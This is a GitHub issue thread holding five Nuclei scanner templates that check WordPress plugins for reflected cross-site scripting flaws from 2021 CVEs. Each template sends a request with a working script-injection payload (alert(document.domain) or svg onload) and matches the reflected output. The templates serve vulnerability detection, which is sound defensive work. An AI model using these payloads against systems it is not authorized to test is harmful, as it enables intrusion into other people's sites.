### ISSUE TITLE
Wordpress Authenticated Templates #2765

### ISSUE THREAD

**Issue by DhiyaneshGeek** [projectdiscovery/nuclei-templates#2880]
```yaml
id: CVE-2021-20792

info:
  name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
  tags: wordpress,cve,cve2021,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-20792
    cwe-id: CWE-79
  description: "Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=mlw_quiz_list&s="><script>alert(document.domain)</script>&paged="><script>alert(/XSS-paged/)</script>'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header
```

```yaml
id: CVE-2021-24510

info:
  name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
  author: dhiyaneshDK
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
  tags: wordpress,cve,cve2021,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-24510
    cwe-id: CWE-79
  description: "The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue"

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><svg/onload=alert(document.domain);><"'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<svg/onload=alert(document.domain);'
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header
```

```yaml
id: CVE-2021-34640

info:
  name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
  author: dhiyaneshDK
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
  tags: wordpress,cve,cve2021,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-34640
    cwe-id: CWE-79
  description: "The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4."

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/options-general.php/"><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header
```

```yaml
id: CVE-2021-34643

info:
  name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a
  tags: wordpress,cve,cve2021,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-34643
    cwe-id: CWE-79
  description: "The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2."

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/options-general.php/"><script>alert(document.domain)</script>/?page=skatubazar_option'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header
```

```yaml
id: CVE-2021-39322

info:
  name: Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  reference:
    - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
  tags: wordpress,cve,cve2021,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-39322
    cwe-id: CWE-79
  description: "The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path."

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header
```
